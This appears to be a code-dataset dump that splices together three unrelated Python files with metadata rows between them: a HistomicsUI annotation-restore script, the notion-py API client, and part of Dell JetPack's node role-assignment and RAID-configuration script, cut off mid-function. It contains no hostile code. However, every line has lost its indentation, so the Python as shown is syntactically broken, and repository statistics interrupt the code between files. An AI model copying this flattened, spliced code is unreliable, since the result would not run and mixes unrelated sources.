'/item/%s/copy?folderId=%s&name=%s©Annotations=False'
% (source_item_info['_id'], folderid, itemname))
# load annotations
with open(annotation_jsonfile) as af:
annotations = json.load(af)
# now post
n_annotations = len(annotations)
for anno, annotation in enumerate(annotations):
try:
print("%s: post annotation %d of %d" % (
monitorPrefix, anno, n_annotations))
_ = gc.post(
"/annotation?itemId=" + item['_id'],
json=annotation['annotation'])
except Exception as e:
print(e.__repr__())
except Exception as e:
print(e.__repr__())
def reproduce_annotations_from_backup(gc, folderid, local):
"""Reproduce annotations on HistomicsUI from local backup.
This is the reverse functionality to dump_annotations.locally().
This reproduces this tiered structure on HistomicsUI. The original
slides (items) must still be there in the folder from the backup was
made because these will be copied (without annotations) before the
local annotations (from JSON files) are posted to them.
Parameters
-----------
gc : girder_client.GirderClient
authenticated girder client instance
folderid : str
girder id of girder folder to post reproduced annotations.
local : str
local path to get subfolders/slides/annotations
"""
monitor = os.path.basename(local)
# for each slide, copy it and post annotations
jsonfiles = [
os.path.join(local, j) for j in os.listdir(local)
if j.endswith('_annotations.json')]
for jsonfile in jsonfiles:
reproduce_annotations_workflow(
gc=gc, folderid=folderid, annotation_jsonfile=jsonfile,
monitorPrefix=monitor)
# for each subfolder, create a new folder on HistomicsUI and call self
subdirs = [
j for j in os.listdir(local) if os.path.isdir(os.path.join(local, j))]
for subdir in subdirs:
try:
# create folder in HistomicsUI
new_folder = gc.post('/folder?parentId=%s&name=%s' % (
folderid, subdir))
# call self with same prameters
reproduce_annotations_from_backup(
gc=gc, folderid=new_folder['_id'],
local=os.path.join(local, subdir))
except Exception as e:
print(e.__repr__())
# %%===========================================================================
| 30.062712
| 79
| 0.634718
|
fa7dbda69466124a2fcd097de4441ea80b91dd93
| 16,401
|
py
|
Python
|
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
notion/client.py
|
AndreCNF/notion-py
|
9ae836ec0f49d86de53d68f32bde6c65ba262511
|
[
"MIT"
] | null | null | null |
import hashlib
import json
import re
import uuid
from requests import Session, HTTPError
from requests.cookies import cookiejar_from_dict
from urllib.parse import urljoin
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from getpass import getpass
from time import sleep
from .block import Block, BLOCK_TYPES
from .collection import (
Collection,
CollectionView,
CollectionRowBlock,
COLLECTION_VIEW_TYPES,
TemplateBlock,
)
from .logger import logger
from .monitor import Monitor
from .operations import operation_update_last_edited, build_operation
from .settings import API_BASE_URL
from .space import Space
from .store import RecordStore
from .user import User
from .utils import extract_id, now
def create_session(client_specified_retry=None):
"""
retry on 502
"""
session = Session()
if client_specified_retry:
retry = client_specified_retry
else:
retry = Retry(
5,
backoff_factor=0.3,
status_forcelist=(502, 503, 504),
# CAUTION: adding 'POST' to this list which is not technically idempotent
method_whitelist=(
"POST",
"HEAD",
"TRACE",
"GET",
"PUT",
"OPTIONS",
"DELETE",
),
)
adapter = HTTPAdapter(max_retries=retry)
session.mount("https://", adapter)
return session
class NotionClient(object):
"""
This is the entry point to using the API. Create an instance of this class, passing it the value of the
"token_v2" cookie from a logged-in browser session on Notion.so. Most of the methods on here are primarily
for internal use -- the main one you'll likely want to use is `get_block`.
"""
def __init__(
self,
token_v2=None,
monitor=False,
start_monitoring=False,
enable_caching=False,
cache_key=None,
email=None,
password=None,
client_specified_retry=None,
):
self.session = create_session(client_specified_retry)
if token_v2:
self.session.cookies = cookiejar_from_dict({"token_v2": token_v2})
else:
self._set_token(email=email, password=password)
if enable_caching:
cache_key = cache_key or hashlib.sha256(token_v2.encode()).hexdigest()
self._store = RecordStore(self, cache_key=cache_key)
else:
self._store = RecordStore(self)
if monitor:
self._monitor = Monitor(self)
if start_monitoring:
self.start_monitoring()
else:
self._monitor = None
self._update_user_info()
def start_monitoring(self):
self._monitor.poll_async()
def _fetch_guest_space_data(self, records):
"""
guest users have an empty `space` dict, so get the space_id from the `space_view` dict instead,
and fetch the space data from the getPublicSpaceData endpoint.
Note: This mutates the records dict
"""
space_id = list(records["space_view"].values())[0]["value"]["space_id"]
space_data = self.post(
"getPublicSpaceData", {"type": "space-ids", "spaceIds": [space_id]}
).json()
records["space"] = {
space["id"]: {"value": space} for space in space_data["results"]
}
def _set_token(self, email=None, password=None):
if not email:
email = input("Enter your Notion email address:\n")
if not password:
password = getpass("Enter your Notion password:\n")
self.post("loginWithEmail", {"email": email, "password": password}).json()
def _update_user_info(self):
records = self.post("loadUserContent", {}).json()["recordMap"]
if not records["space"]:
self._fetch_guest_space_data(records)
self._store.store_recordmap(records)
self.current_user = self.get_user(list(records["notion_user"].keys())[0])
self.current_space = self.get_space(list(records["space"].keys())[0])
return records
def get_email_uid(self):
response = self.post("getSpaces", {}).json()
return {
response[uid]["notion_user"][uid]["value"]["email"]: uid
for uid in response.keys()
}
def set_user_by_uid(self, user_id):
self.session.headers.update({"x-notion-active-user-header": user_id})
self._update_user_info()
def set_user_by_email(self, email):
email_uid_dict = self.get_email_uid()
uid = email_uid_dict.get(email)
if not uid:
raise Exception(
"Requested email address {email} not found; available addresses: {available}".format(
email=email, available=list(email_uid_dict)
)
)
self.set_user_by_uid(uid)
def get_top_level_pages(self):
records = self._update_user_info()
return [self.get_block(bid) for bid in records["block"].keys()]
def get_record_data(self, table, id, force_refresh=False, limit=100):
return self._store.get(table, id, force_refresh=force_refresh, limit=limit)
def get_block(self, url_or_id, force_refresh=False, limit=100):
"""
Retrieve an instance of a subclass of Block that maps to the block/page identified by the URL or ID passed in.
"""
block_id = extract_id(url_or_id)
block = self.get_record_data("block", block_id, force_refresh=force_refresh, limit=limit)
if not block:
return None
if block.get("parent_table") == "collection":
if block.get("is_template"):
block_class = TemplateBlock
else:
block_class = CollectionRowBlock
else:
block_class = BLOCK_TYPES.get(block.get("type", ""), Block)
return block_class(self, block_id)
def get_collection(self, collection_id, force_refresh=False):
"""
Retrieve an instance of Collection that maps to the collection identified by the ID passed in.
"""
coll = self.get_record_data(
"collection", collection_id, force_refresh=force_refresh
)
return Collection(self, collection_id) if coll else None
def get_user(self, user_id, force_refresh=False):
"""
Retrieve an instance of User that maps to the notion_user identified by the ID passed in.
"""
user = self.get_record_data("notion_user", user_id, force_refresh=force_refresh)
return User(self, user_id) if user else None
def get_space(self, space_id, force_refresh=False):
"""
Retrieve an instance of Space that maps to the space identified by the ID passed in.
"""
space = self.get_record_data("space", space_id, force_refresh=force_refresh)
return Space(self, space_id) if space else None
def get_collection_view(self, url_or_id, collection=None, force_refresh=False):
"""
Retrieve an instance of a subclass of CollectionView that maps to the appropriate type.
The `url_or_id` argument can either be the URL for a database page, or the ID of a collection_view (in which case
you must also pass the collection)
"""
# if it's a URL for a database page, try extracting the collection and view IDs
if url_or_id.startswith("http"):
match = re.search("([a-f0-9]{32})\?v=([a-f0-9]{32})", url_or_id)
if not match:
raise Exception("Invalid collection view URL")
block_id, view_id = match.groups()
collection = self.get_block(
block_id, force_refresh=force_refresh
).collection
else:
view_id = url_or_id
assert (
collection is not None
), "If 'url_or_id' is an ID (not a URL), you must also pass the 'collection'"
view = self.get_record_data(
"collection_view", view_id, force_refresh=force_refresh
)
return (
COLLECTION_VIEW_TYPES.get(view.get("type", ""), CollectionView)(
self, view_id, collection=collection
)
if view
else None
)
def refresh_records(self, **kwargs):
"""
The keyword arguments map table names into lists of (or singular) record IDs to load for that table.
Use `True` instead of a list to refresh all known records for that table.
"""
self._store.call_get_record_values(**kwargs)
def refresh_collection_rows(self, collection_id):
row_ids = [row.id for row in self.get_collection(collection_id).get_rows()]
self._store.set_collection_rows(collection_id, row_ids)
def post(self, endpoint, data):
"""
All API requests on Notion.so are done as POSTs (except the websocket communications).
"""
url = urljoin(API_BASE_URL, endpoint)
response = self.session.post(url, json=data)
if response.status_code == 400:
logger.error(
"Got 400 error attempting to POST to {}, with data: {}".format(
endpoint, json.dumps(data, indent=2)
)
)
raise HTTPError(
response.json().get(
"message", "There was an error (400) submitting the request."
)
)
response.raise_for_status()
return response
def submit_transaction(self, operations, update_last_edited=True):
if not operations:
return
if isinstance(operations, dict):
operations = [operations]
if update_last_edited:
updated_blocks = set(
[op["id"] for op in operations if op["table"] == "block"]
)
operations += [
operation_update_last_edited(self.current_user.id, block_id)
for block_id in updated_blocks
]
# if we're in a transaction, just add these operations to the list; otherwise, execute them right away
if self.in_transaction():
self._transaction_operations += operations
else:
data = {"operations": operations}
self.post("submitTransaction", data)
self._store.run_local_operations(operations)
def query_collection(self, *args, **kwargs):
return self._store.call_query_collection(*args, **kwargs)
def as_atomic_transaction(self):
"""
Returns a context manager that buffers up all calls to `submit_transaction` and sends them as one big transaction
when the context manager exits.
"""
return Transaction(client=self)
def in_transaction(self):
"""
Returns True if we're currently in a transaction, otherwise False.
"""
return hasattr(self, "_transaction_operations")
def search_pages_with_parent(self, parent_id, search="", limit=100):
data = {
"query": search,
"parentId": parent_id,
"limit": limit,
"spaceId": self.current_space.id,
}
response = self.post("searchPagesWithParent", data).json()
self._store.store_recordmap(response["recordMap"])
return response["results"]
def search_blocks(self, search, limit=25):
return self.search(query=search, limit=limit)
def search(
self,
query="",
search_type="BlocksInSpace",
limit=100,
sort="Relevance",
source="quick_find",
isDeletedOnly=False,
excludeTemplates=False,
isNavigableOnly=False,
requireEditPermissions=False,
ancestors=[],
createdBy=[],
editedBy=[],
lastEditedTime={},
createdTime={},
):
data = {
"type": search_type,
"query": query,
"spaceId": self.current_space.id,
"limit": limit,
"filters": {
"isDeletedOnly": isDeletedOnly,
"excludeTemplates": excludeTemplates,
"isNavigableOnly": isNavigableOnly,
"requireEditPermissions": requireEditPermissions,
"ancestors": ancestors,
"createdBy": createdBy,
"editedBy": editedBy,
"lastEditedTime": lastEditedTime,
"createdTime": createdTime,
},
"sort": sort,
"source": source,
}
response = self.post("search", data).json()
self._store.store_recordmap(response["recordMap"])
return [self.get_block(result["id"]) for result in response["results"]]
def create_record(self, table, parent, **kwargs):
# make up a new UUID; apparently we get to choose our own!
record_id = str(uuid.uuid4())
child_list_key = kwargs.get("child_list_key") or parent.child_list_key
args = {
"id": record_id,
"version": 1,
"alive": True,
"created_by_id": self.current_user.id,
"created_by_table": "notion_user",
"created_time": now(),
"parent_id": parent.id,
"parent_table": parent._table,
}
args.update(kwargs)
with self.as_atomic_transaction():
# create the new record
self.submit_transaction(
build_operation(
args=args, command="set", id=record_id, path=[], table=table
)
)
# add the record to the content list of the parent, if needed
if child_list_key:
self.submit_transaction(
build_operation(
id=parent.id,
path=[child_list_key],
args={"id": record_id},
command="listAfter",
table=parent._table,
)
)
return record_id
def get_task_status(self, task_id):
"""
Get a status of a single task
"""
data = self.post(
"getTasks",
{
"taskIds": [task_id]
}
).json()
results = data.get("results")
if results is None:
return None
if not results:
# Notion does not know about such a task
print("Invalid task ID.")
return None
if len(results) == 1:
state = results[0].get("state")
return state
return None
def wait_for_task(self, task_id, interval=1, tries=10):
"""
Wait for a task by looping 'tries' times ever 'interval' seconds.
The 'interval' parameter can be used to specify milliseconds using double (e.g 0.75).
"""
for i in range(tries):
state = self.get_task_status(task_id)
if state in ["not_started", "in_progress"]:
sleep(interval)
elif state == "success":
return state
print("Task takes more time than expected. Specify 'interval' or 'tries' to wait more.")
class Transaction(object):
is_dummy_nested_transaction = False
def __init__(self, client):
self.client = client
def __enter__(self):
if hasattr(self.client, "_transaction_operations"):
# client is already in a transaction, so we'll just make this one a nullop and let the outer one handle it
self.is_dummy_nested_transaction = True
return
self.client._transaction_operations = []
self.client._pages_to_refresh = []
self.client._blocks_to_refresh = []
def __exit__(self, exc_type, exc_value, traceback):
if self.is_dummy_nested_transaction:
return
operations = self.client._transaction_operations
del self.client._transaction_operations
# only actually submit the transaction if there was no exception
if not exc_type:
self.client.submit_transaction(operations)
self.client._store.handle_post_transaction_refreshing()
| 34.311715
| 121
| 0.59283
|
cb6761195cd0c56e0ecd633df1dcc3c8f429852c
| 59,361
|
py
|
Python
|
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | 1
|
2019-04-01T16:01:01.000Z
|
2019-04-01T16:01:01.000Z
|
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | null | null | null |
src/pilot/assign_role.py
|
kamlesh6808/JetPack
|
54871b307cc7385939dd89f9bb5e9ed9bb3036fe
|
[
"Apache-2.0"
] | 1
|
2021-07-15T15:26:53.000Z
|
2021-07-15T15:26:53.000Z
|
#!/usr/bin/python3
# Copyright (c) 2016-2021 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
from collections import defaultdict
from collections import namedtuple
from constants import Constants
from shutil import copyfile
import json
import logging
import math
import os
import sys
import yaml
import errno
import fcntl
import time
from dracclient import utils
from dracclient.constants import POWER_OFF
from dracclient.constants import RebootRequired
from dracclient.exceptions import DRACOperationFailed, \
DRACUnexpectedReturnValue, WSManInvalidResponse, WSManRequestFailure
from oslo_utils import units
from arg_helper import ArgHelper
from credential_helper import CredentialHelper
from ironic_helper import IronicHelper
from job_helper import JobHelper
from logging_helper import LoggingHelper
import requests.packages
from ironicclient.common.apiclient.exceptions import InternalServerError
discover_nodes_path = os.path.join(os.path.expanduser('~'),
'pilot/discover_nodes')
sys.path.append(discover_nodes_path)
from discover_nodes.dracclient.client import DRACClient # noqa
requests.packages.urllib3.disable_warnings()
# Perform basic configuration of the logging system, which configures the root
# logger. It creates a StreamHandler with a default Formatter and adds it to
# the root logger. Log messages are directed to stderr. This configuration
# applies to the log messages emitted by this script and the modules in the
# packages it uses, such as ironicclient and dracclient.
logging.basicConfig()
# Create this script's logger. Give it a more friendly name than __main__.
LOG = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])
LOG.setLevel(logging.DEBUG)
# Create a factory function for creating tuple-like objects that contain the
# role that the node will play and an optional index that indicates placement
# order in the rack.
#
# The article
# http://stackoverflow.com/questions/35988/c-like-structures-in-python
# describes the use of collections.namedtuple to implement C-like structures in
# Python.
RoleIndex = namedtuple('RoleIndex', ['role', 'index', ])
DCIM_VirtualDiskView = ('http://schemas.dell.com/wbem/wscim/1/cim-schema/2/'
'DCIM_VirtualDiskView')
DCIM_PhysicalDiskView = ('http://schemas.dell.com/wbem/wscim/1/cim-schema/2/'
'DCIM_PhysicalDiskView')
NORAID = "1"
RAID0 = "2"
RAID_TYPE_TO_DESCRIPTION = {
NORAID: "No RAID",
RAID0: "RAID0",
"4": "RAID1",
"64": "RAID5",
"128": "RAID6",
"2048": "RAID10",
"8192": "RAID50",
"16384": "RAID60"
}
NOT_SUPPORTED_MSG = " operation is not supported on th"
ROLES = {
'controller': 'control',
'compute': 'compute',
'storage': 'ceph-storage',
'computehci': 'computehci',
'powerflex': 'powerflex-storage'
}
# TODO: Use the OpenStack Oslo logging library, instead of the Python standard
# library logging facility.
#
# This would have value if this code is contributed to ironic upstream
# and ironic is using the Oslo logging library.
def parse_arguments():
parser = argparse.ArgumentParser(
description="Assigns role to Overcloud node.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("ip_mac_service_tag",
help="""IP address of the iDRAC, MAC address of the
interface on the provisioning network,
or service tag of the node""",
metavar="ADDRESS")
parser.add_argument("role_index",
type=role_index,
help="""role that the node will play, with an optional
index that indicates placement order in the
rack; choices are controller[-<index>],
compute[-<index>], and storage[-<index>]""",
metavar="ROLE")
parser.add_argument("-f",
"--flavor-settings",
default="~/pilot/flavors_settings.json",
help="file that contains flavor settings",
metavar="FILENAME")
parser.add_argument('-s',
'--skip-raid-config',
action='store_true',
help="skip configuring RAID")
parser.add_argument('-b',
'--skip-bios-config',
action='store_true',
help="skip configuring BIOS")
parser.add_argument('-o',
'--os-volume-size-gb',
help="the size of the volume to install the OS on "
"in GB",
metavar="OSVOLUMESIZEGB")
ArgHelper.add_instack_arg(parser)
LoggingHelper.add_argument(parser)
return parser.parse_args()
def role_index(string):
role = string
index = None
if string.find("-") != -1:
role_tokens = role.rsplit('-', 1)
role = role_tokens[0]
index = role_tokens[1]
# do not check roles as we may have edge nodes
#if role not in ROLES.keys():
# raise argparse.ArgumentTypeError(
# "{} is not a valid role; choices are {}".format(
# role, str(
# ROLES.keys())))
if index and not index.isdigit():
raise argparse.ArgumentTypeError(
"{} is not a valid role index; it must be a number".format(index))
return RoleIndex(role, index)
def get_flavor_settings(json_filename):
flavor_settings = None
try:
with open(json_filename, 'r') as f:
try:
flavor_settings = json.load(f)
except ValueError:
LOG.exception(
"Could not deserialize flavor settings file {}".format(
json_filename))
except IOError:
LOG.exception(
"Could not open flavor settings file {}".format(json_filename))
return flavor_settings
def calculate_bios_settings(super_role, flavor_settings, json_filename):
return calculate_category_settings_for_role(
'bios',
super_role,
flavor_settings,
json_filename)
def calculate_category_settings_for_role(
category,
super_role,
flavor_settings,
json_filename):
default = {}
if 'default' in flavor_settings and category in flavor_settings['default']:
default = flavor_settings['default'][category]
flavor = ROLES[super_role]
flavor_specific = {}
if flavor in flavor_settings and category in flavor_settings[flavor]:
flavor_specific = flavor_settings[flavor][category]
# Flavor-specific settings take precedence over default settings.
category_settings = merge_two_dicts(default, flavor_specific)
if not category_settings:
LOG.critical(
'File {} does not contain "{}" settings for flavor "{}"'.format(
json_filename,
category,
flavor))
return None
return category_settings
def merge_two_dicts(x, y):
z = x.copy()
z.update(y)
return z
def get_drac_client(node_definition_filename, node):
drac_ip, drac_user, drac_password = \
CredentialHelper.get_drac_creds_from_node(node,
node_definition_filename)
drac_client = DRACClient(drac_ip, drac_user, drac_password)
# TODO: Validate the IP address is an iDRAC.
#
# This could detect an error by an off-roading user who provided an
# incorrect IP address for the iDRAC.
#
# A to be developed dracclient API should be used to perform the
# validation.
return drac_client
def define_target_raid_config(super_role, drac_client):
raid_controller_ids = get_raid_controller_ids(drac_client)
if not raid_controller_ids:
LOG.critical("Found no RAID controller")
return None
if super_role == 'controller':
logical_disks = define_controller_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'compute':
logical_disks = define_compute_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'storage':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'computehci':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
elif super_role == 'powerflex':
logical_disks = define_storage_logical_disks(drac_client,
raid_controller_ids)
else:
LOG.critical(
'Cannot define target RAID configuration for role "{}"').format(
super_role)
return None
return {
'logical_disks': logical_disks} if logical_disks is not None else None
def get_raid_controller_ids(drac_client):
disk_ctrls = drac_client.list_raid_controllers()
raid_controller_ids = []
for cnt in disk_ctrls:
if drac_client.is_raid_controller(cnt.id):
raid_controller_ids.append(cnt.id)
return raid_controller_ids
def define_controller_logical_disks(drac_client, raid_controller_ids):
if len(raid_controller_ids) > 1:
LOG.critical(
"Found more than one RAID controller:\n {}".format(
"\n ".join(raid_controller_ids)))
return None
raid_10_logical_disk = define_single_raid_10_logical_disk(
drac_client, raid_controller_ids[0])
# None indicates an error occurred.
if raid_10_logical_disk is None:
return None
logical_disks = list()
# Add the disk to the list only if it is not empty.
if raid_10_logical_disk:
logical_disks.append(raid_10_logical_disk)
return logical_disks
def define_compute_logical_disks(drac_client, raid_controller_ids):
if len(raid_controller_ids) > 1:
LOG.critical(
"Found more than one RAID controller:\n {}".format(
"\n ".join(raid_controller_ids)))
return None
raid_10_logical_disk = define_single_raid_10_logical_disk(
drac_client, raid_controller_ids[0])
# None indicates an error occurred.
if raid_10_logical_disk is None:
return None
logical_disks = list()
# Add the disk to the list only if it is not empty.
if raid_10_logical_disk:
logical_disks.append(raid_10_logical_disk)
return logical_disks
def define_single_raid_10_logical_disk(drac_client, raid_controller_name):
physical_disk_names = get_raid_controller_physical_disk_ids(
drac_client, raid_controller_name)
number_physical_disks = len(physical_disk_names)
if number_physical_disks >= 4:
LOG.info(
"Defining RAID 10 on the following physical disks, and marking it "
"the root volume:\n {}".format(
"\n ".join(physical_disk_names)))
logical_disk = define_logical_disk(
'MAX',
'1+0',
raid_controller_name,
physical_disk_names,
is_root_volume=True)
elif number_physical_disks == 3 or number_physical_disks == 2:
LOG.warning(
"Did not find enough disks for RAID 10; defining RAID 1 on the "
"following physical disks, and marking it the root volume:"
"\n {}".format(
"\n ".join(physical_disk_names)))
logical_disk = define_logical_disk(
'MAX',
'1',
raid_controller_name,
physical_disk_names,
is_root_volume=True)
elif number_physical_disks == 1:
LOG.warning(
"Did not find enough disks for RAID; setting physical disk {} to "
"JBOD mode".format(
physical_disk_names[0]))
logical_disk = define_jbod_or_raid_0_logical_disk(
drac_client,
raid_controller_name,
physical_disk_names[0],
is_root_volume=True)
else:
LOG.critical(
"Found no physical disks connected to RAID controller {}".format(
raid_controller_name))
return None
return logical_disk
def get_raid_controller_physical_disk_ids(drac_client, raid_controller_fqdd):
physical_disks = drac_client.list_physical_disks()
return sorted(
(d.id for d in physical_disks if d.controller == raid_controller_fqdd),
key=physical_disk_id_to_key)
def check_cntlr_physical_disks_len(cntrl_physical_disks):
# Make sure we have enough drives attached to the RAID controller to create
# a RAID1
if len(cntrl_physical_disks) >= 2:
return True
def define_storage_logical_disks(drac_client, raid_controllers):
all_physical_disks = drac_client.list_physical_disks()
# Get the drives controlled by the RAID controller
raid_cntlr_physical_disks = {}
for disk in all_physical_disks:
if disk.controller in raid_controllers:
if disk.controller in raid_cntlr_physical_disks:
raid_cntlr_physical_disks[disk.controller].append(disk)
else:
raid_cntlr_physical_disks[disk.controller] = [disk]
# Make sure we have at least one drive for Ceph OSD/journals
if len(all_physical_disks) < 3:
LOG.critical(
"Storage nodes must have at least one drive for Ceph OSD/journal "
"configuration")
return None
boss_controller = [cntrl for cntrl in raid_controllers
if drac_client.is_boss_controller(cntrl)]
if boss_controller:
if check_cntlr_physical_disks_len(
raid_cntlr_physical_disks[boss_controller[0]]):
os_logical_disk = define_storage_operating_system_logical_disk(
raid_cntlr_physical_disks[boss_controller[0]],
drac_client, boss_controller[0])
else:
LOG.critical("The BOSS card has only 1 SSD. "
"2 SSDs are needed to configure a RAID 1")
return None
else:
raid_controller = [cntrl for cntrl in raid_controllers
if len(raid_cntlr_physical_disks[cntrl]) >= 2]
if raid_controller:
os_logical_disk = define_storage_operating_system_logical_disk(
raid_cntlr_physical_disks[raid_controller[0]],
drac_client, raid_controller[0])
else:
LOG.critical("At least 2 drives controlled by the same RAID "
"controller are needed to configure a RAID 1")
return None
if os_logical_disk is None:
return None
os_physical_disk_names = os_logical_disk['physical_disks'] \
if 'physical_disks' in os_logical_disk else None
# Define JBOD logical disks with the remaining physical disks.
#
# A successful call returns a list, which may be empty; otherwise,
# None is returned.
logical_disks = [os_logical_disk]
for raid_controller in raid_controllers:
jbod_capable = drac_client.is_jbod_capable(raid_controller)
# Determine the physical disks that remain for JBOD.
remaining_physical_disks = [disk for disk in
raid_cntlr_physical_disks[raid_controller]
if disk.id not in os_physical_disk_names]
jbod_logical_disks = define_jbod_logical_disks(
drac_client, remaining_physical_disks, raid_controller,
jbod_capable)
if jbod_logical_disks is None:
return None
logical_disks.extend(jbod_logical_disks)
return logical_disks
def define_storage_operating_system_logical_disk(physical_disks, drac_client,
raid_controller_name):
(os_logical_disk_size_gb,
os_physical_disk_names) = find_physical_disks_for_storage_os(
physical_disks)
if os_physical_disk_names is None:
return None
# Define a RAID 1 logical disk to host the operating system.
LOG.info(
"Defining RAID 1 logical disk of size {} GB on the following physical "
"disks, and marking it the root volume:\n {}".format(
str(int(os_logical_disk_size_gb)),
'\n '.join(os_physical_disk_names)))
if drac_client.is_boss_controller(raid_controller_name):
os_logical_disk_size_gb = 0
os_logical_disk = define_logical_disk(
int(os_logical_disk_size_gb),
'1',
raid_controller_name,
os_physical_disk_names,
is_root_volume=True)
return os_logical_disk
def find_physical_disks_for_storage_os(physical_disks):
physical_disk_selection_strategies = [
(cardinality_of_smallest_spinning_disk_size_is_two,
'two drives of smallest hard disk drive size'),
(last_two_disks_by_location,
'last two drives by location')]
for index, (strategy, description) in enumerate(
physical_disk_selection_strategies, start=1):
os_logical_disk_size_gb, os_physical_disk_names = strategy(
physical_disks)
assert (os_logical_disk_size_gb and os_physical_disk_names) or not (
os_logical_disk_size_gb or os_physical_disk_names)
if os_physical_disk_names:
LOG.info(
"Strategy {} for selecting physical disks for the operating "
"system logical disk -- {} -- found disks:\n {}".format(
index,
description,
'\n '.join(os_physical_disk_names)))
assert len(os_physical_disk_names) >= 2
break
else:
LOG.info(
"Strategy {} for selecting physical disks for the operating "
"system logical disk -- {} -- found no disks".format(
index,
description))
if os_physical_disk_names is None:
LOG.critical(
"Could not find physical disks for operating system logical disk")
return (os_logical_disk_size_gb, os_physical_disk_names)
def cardinality_of_smallest_spinning_disk_size_is_two(physical_disks):
# Bin the spinning physical disks (hard disk drives (HDDs)) by size
# in gigabytes (GB).
disks_by_size = bin_physical_disks_by_size_gb(physical_disks,
media_type_filter='hdd')
# Order the bins by size, from smallest to largest. Since Python
# dictionaries are unordered, construct a sorted list of bins. Each
# bin is a dictionary item, which is a tuple.
ordered_disks_by_size = sorted(disks_by_size.items(), key=lambda t: t[0])
# Handle the case where we have no spinning disks
if not ordered_disks_by_size:
return (0, None)
# Obtain the bin for the smallest size.
smallest_disks_bin = ordered_disks_by_size[0]
smallest_disk_size = smallest_disks_bin[0]
smallest_disks = smallest_disks_bin[1]
cardinality_of_smallest_disks = len(smallest_disks)
if cardinality_of_smallest_disks == 2:
sorted_smallest_disk_ids = sorted((d.id for d in smallest_disks),
key=physical_disk_id_to_key)
return (smallest_disk_size, sorted_smallest_disk_ids)
else:
return (0, None)
def last_two_disks_by_location(physical_disks):
assert len(physical_disks) >= 2
disks_by_location = sorted((d for d in physical_disks),
key=physical_disk_to_key)
last_two_disks = disks_by_location[-2:]
# The two disks (2) must be of the same media type, hard disk drive
# (HDD) spinner or solid state drive (SSD).
if last_two_disks[0].media_type != last_two_disks[1].media_type:
return (0, None)
# Determine the smallest size of the two (2) disks, in gigabytes.
logical_disk_size_mb = 0
if last_two_disks[0].size_mb == last_two_disks[1].size_mb:
# They are of equal size.
logical_disk_size_mb = last_two_disks[0].size_mb
elif last_two_disks[0].size_mb < last_two_disks[1].size_mb:
# The first disk is smaller.
logical_disk_size_mb = last_two_disks[0].size_mb
else:
# The second disk is smaller.
logical_disk_size_mb = last_two_disks[1].size_mb
logical_disk_size_gb = int(logical_disk_size_mb / 1024)
# Ensure that the logical disk size is unique from the perspective
# of Linux logical volumes.
# We only need to consider the other disks, those that are not the
# last two (2).
other_disks = disks_by_location[:-2]
other_disks_by_size_gb = bin_physical_disks_by_size_gb(other_disks)
while logical_disk_size_gb in other_disks_by_size_gb:
# Subtract one (1) from the logical disk size and try again.
logical_disk_size_gb -= 1
else:
assert logical_disk_size_gb > 0
last_two_disk_ids = [d.id for d in last_two_disks]
return (logical_disk_size_gb, last_two_disk_ids)
def bin_physical_disks_by_size_gb(physical_disks, media_type_filter=None):
disks_by_size = defaultdict(list)
for physical_disk in physical_disks:
# Apply media type filter, if present.
if (media_type_filter is None or
physical_disk.media_type == media_type_filter):
disks_by_size[physical_disk.free_size_mb / 1024].append(physical_disk)
return disks_by_size
def define_jbod_logical_disks(
drac_client, physical_disks, raid_controller_name, jbod_capable):
sorted_physical_disk_names = sorted((d.id for d in physical_disks),
key=physical_disk_id_to_key)
logical_disks = list()
for physical_disk_name in sorted_physical_disk_names:
jbod_logical_disk = define_jbod_or_raid_0_logical_disk(
drac_client, raid_controller_name, physical_disk_name,
is_root_volume=False, jbod_capable=jbod_capable)
if jbod_logical_disk:
logical_disks.append(jbod_logical_disk)
return logical_disks
def define_jbod_or_raid_0_logical_disk(drac_client,
raid_controller_name,
physical_disk_name,
is_root_volume=False,
jbod_capable=None):
if jbod_capable is None:
jbod_capable = drac_client.is_jbod_capable(raid_controller_name)
if jbod_capable:
# Presently, when a RAID controller is JBOD capable, there is no
# need to return a logical disk definition. That will hold as
# long as this script executes the ironic DRAC driver RAID
# delete_configuration clean step before the
# create_configuration step, and it leaves all of the physical
# disks in JBOD mode.
'''TODO: Define a JBOD logical disk when the ironic DRAC driver
supports the 'raid_level' property's 'JBOD' value in the RAID
configuration JSON. That is a more robust approach and better
documents the RAID configuration on the ironic node. It would
also eliminate the dependency the RAID create_configuration
clean step has on the delete_configuration step.'''
return dict()
else:
return define_logical_disk('MAX', '0', raid_controller_name,
[physical_disk_name], is_root_volume)
def define_logical_disk(
size_gb,
raid_level,
controller_name,
physical_disk_names,
is_root_volume=False):
logical_disk = dict(
size_gb=size_gb,
raid_level=raid_level,
controller=controller_name,
physical_disks=physical_disk_names)
if is_root_volume:
logical_disk['is_root_volume'] = is_root_volume
return logical_disk
def physical_disk_id_to_key(disk_id):
components = disk_id.split(':')
disk_subcomponents = components[0].split('.')
if len(components) > 3:
enclosure_subcomponents = components[1].split('.')
controller_subcomponents = components[2].split('.')
else:
enclosure_subcomponents = 'Enclosure.None.0-0'.split('.')
controller_subcomponents = components[1].split('.')
disk_connection_type = disk_subcomponents[1]
try:
disk_number = int(disk_subcomponents[2])
except: # noqa: E722
